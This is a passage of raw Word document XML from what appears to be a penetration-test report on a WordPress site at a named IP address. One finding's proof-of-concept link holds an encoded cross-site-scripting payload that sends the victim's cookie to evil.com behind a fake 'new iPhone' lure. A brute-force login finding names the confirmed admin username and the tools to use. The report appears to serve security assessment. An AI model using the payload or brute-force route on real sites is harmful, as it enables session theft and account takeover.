                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
                </w:rPr>
                <w:t>http://185.218.124.165/index.php?search_query=%3Ca+href%3D%22https%3A%2F%2Fvulnerable-site.com%2Fsearch%3Fsearch_query%3D%3Cscript%3Edocument.location%3D%27https%3A%2F%2Fevil.com%2Fsteal%3Fcookie%3D%27%2Bdocument.cookie%3C%2Fscript%3E%22%3E+You+got+a+new+iPhone%21+Click+here%3C%2Fa%3E</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10425" w:type="dxa"/>
            <w:tcBorders/>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:suppressAutoHyphens w:val="true"/>
              <w:spacing w:lineRule="auto" w:line="240" w:before="80" w:after="120"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Normaltextrun"/>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Screenshots:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10425" w:type="dxa"/>
            <w:tcBorders/>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:suppressAutoHyphens w:val="true"/>
              <w:spacing w:lineRule="auto" w:line="240" w:before="80" w:after="120"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>→</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:suppressAutoHyphens w:val="true"/>
              <w:spacing w:lineRule="auto" w:line="240" w:before="80" w:after="120"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Arial"/>
                <w:b/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>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6482715" cy="1616075"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapSquare wrapText="largest"/>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4"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="6482715" cy="1616075"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:anchor>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:suppressAutoHyphens w:val="true"/>
              <w:spacing w:lineRule="auto" w:line="240" w:before="80" w:after="120"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Arial"/>
                <w:b/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:suppressAutoHyphens w:val="true"/>
              <w:spacing w:lineRule="auto" w:line="240" w:before="80" w:after="120"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Arial"/>
                <w:b/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:suppressAutoHyphens w:val="true"/>
              <w:spacing w:lineRule="auto" w:line="240" w:before="80" w:after="120"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Arial"/>
                <w:b/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:suppressAutoHyphens w:val="true"/>
              <w:spacing w:lineRule="auto" w:line="240" w:before="80" w:after="120"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Arial"/>
                <w:b/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:suppressAutoHyphens w:val="true"/>
              <w:spacing w:lineRule="auto" w:line="240" w:before="80" w:after="120"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Arial"/>
                <w:b/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:suppressAutoHyphens w:val="true"/>
              <w:spacing w:lineRule="auto" w:line="240" w:before="80" w:after="120"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Arial"/>
                <w:b/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Vulnerability 3</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af"/>
        <w:tblW w:w="10425" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="108" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="108" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:firstRow="1" w:noVBand="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:val="04a0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10425"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10425" w:type="dxa"/>
            <w:tcBorders/>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:suppressAutoHyphens w:val="true"/>
              <w:spacing w:lineRule="auto" w:line="240" w:before="80" w:after="120"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Normaltextrun"/>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve">Description: Brute Force Login Possible -&gt;&gt; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="StrongEmphasis"/>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri" w:cstheme="minorHAnsi"/>
                <w:kern w:val="0"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>RISK: High</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Normaltextrun"/>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">The WordPress instance on port </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="StrongEmphasis"/>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri" w:cstheme="minorHAnsi"/>
                <w:kern w:val="0"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>8080</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Normaltextrun"/>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> exposes the standard login interface via </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:rFonts w:cs="Calibri" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>/wp-login.php</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Normaltextrun"/>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>, allowing unlimited login attempts without any account lockout, CAPTCHA, or rate limiting mechanisms. The login page accepts repeated POST requests with no observable delay or denial, exposing the site to automated brute-force password attacks.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TextBody"/>
              <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>This vulnerability allows attackers to:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TextBody"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="clear" w:pos="720"/>
                <w:tab w:val="left" w:pos="0" w:leader="none"/>
              </w:tabs>
              <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
              <w:ind w:left="707" w:hanging="283"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve">Automate login attempts using tools like </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>hydra</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>wpscan</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t xml:space="preserve">BurpSuit </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t xml:space="preserve">or </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>Intruder</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TextBody"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="clear" w:pos="720"/>
                <w:tab w:val="left" w:pos="0" w:leader="none"/>
              </w:tabs>
              <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
              <w:ind w:left="707" w:hanging="283"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Compromise user credentials (especially admin),</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TextBody"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="clear" w:pos="720"/>
                <w:tab w:val="left" w:pos="0" w:leader="none"/>
              </w:tabs>
              <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
              <w:ind w:left="707" w:hanging="283"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Bypass weak authentication setups and gain full control over the CMS.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TextBody"/>
              <w:widowControl w:val="false"/>
              <w:suppressAutoHyphens w:val="true"/>
              <w:spacing w:lineRule="auto" w:line="240" w:before="80" w:after="120"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Normaltextrun"/>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve">Location:  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:rFonts w:cs="Calibri" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>http://185.218.124.165:8080/wp-login.php</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TextBody"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="clear" w:pos="720"/>
                <w:tab w:val="left" w:pos="0" w:leader="none"/>
              </w:tabs>
              <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
              <w:ind w:left="720" w:hanging="283"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="StrongEmphasis"/>
              </w:rPr>
              <w:t>Observed behavior:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TextBody"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="clear" w:pos="720"/>
                <w:tab w:val="left" w:pos="0" w:leader="none"/>
              </w:tabs>
              <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
              <w:ind w:left="707" w:hanging="283"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>No IP lockout after multiple failed login attempts</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TextBody"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="clear" w:pos="720"/>
                <w:tab w:val="left" w:pos="0" w:leader="none"/>
              </w:tabs>
              <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
              <w:ind w:left="707" w:hanging="283"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve">Username </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="StrongEmphasis"/>
              </w:rPr>
              <w:t>admin</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> confirmed at </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>/author/admin</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TextBody"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="clear" w:pos="720"/>
                <w:tab w:val="left" w:pos="0" w:leader="none"/>
              </w:tabs>
              <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
              <w:ind w:left="720" w:hanging="283"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="StrongEmphasis"/>
              </w:rPr>
              <w:t>Tested with:</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> manual login attempts using dummy passwords</w:t>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tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10425" w:type="dxa"/>
            <w:tcBorders/>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:suppressAutoHyphens w:val="true"/>
              <w:spacing w:lineRule="auto" w:line="240" w:before="80" w:after="120"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>-&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10425" w:type="dxa"/>
            <w:tcBorders/>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:suppressAutoHyphens w:val="true"/>
              <w:spacing w:lineRule="auto" w:line="240" w:before="80" w:after="120"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Normaltextrun"/>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Screenshots:</w:t>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drawing>
                <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="94">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>0</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>27940</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="6482715" cy="2996565"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapSquare wrapText="largest"/>
                  <wp:docPr id="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 descr=""/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId5"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="6482715" cy="2996565"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:anchor>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10425" w:type="dxa"/>
            <w:tcBorders/>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:suppressAutoHyphens w:val="true"/>
              <w:spacing w:lineRule="auto" w:line="240" w:before="80" w:after="120"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>-&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Vulnerability 4</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af"/>
        <w:tblW w:w="10425" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="108" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="108" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:firstRow="1" w:noVBand="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:val="04a0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10425"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10425" w:type="dxa"/>
            <w:tcBorders/>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TextBody"/>
              <w:widowControl w:val="false"/>
              <w:suppressAutoHyphens w:val="true"/>
              <w:spacing w:lineRule="auto" w:line="240" w:before="80" w:after="120"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="StrongEmphasis"/>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri" w:cstheme="minorHAnsi"/>
                <w:kern w:val="0"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Description:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Normaltextrun"/>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> Insecure Communication Channel (No HTTPS) → </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="StrongEmphasis"/>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri" w:cstheme="minorHAnsi"/>
                <w:kern w:val="0"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>RISK: High</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Normaltextrun"/>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:br/>
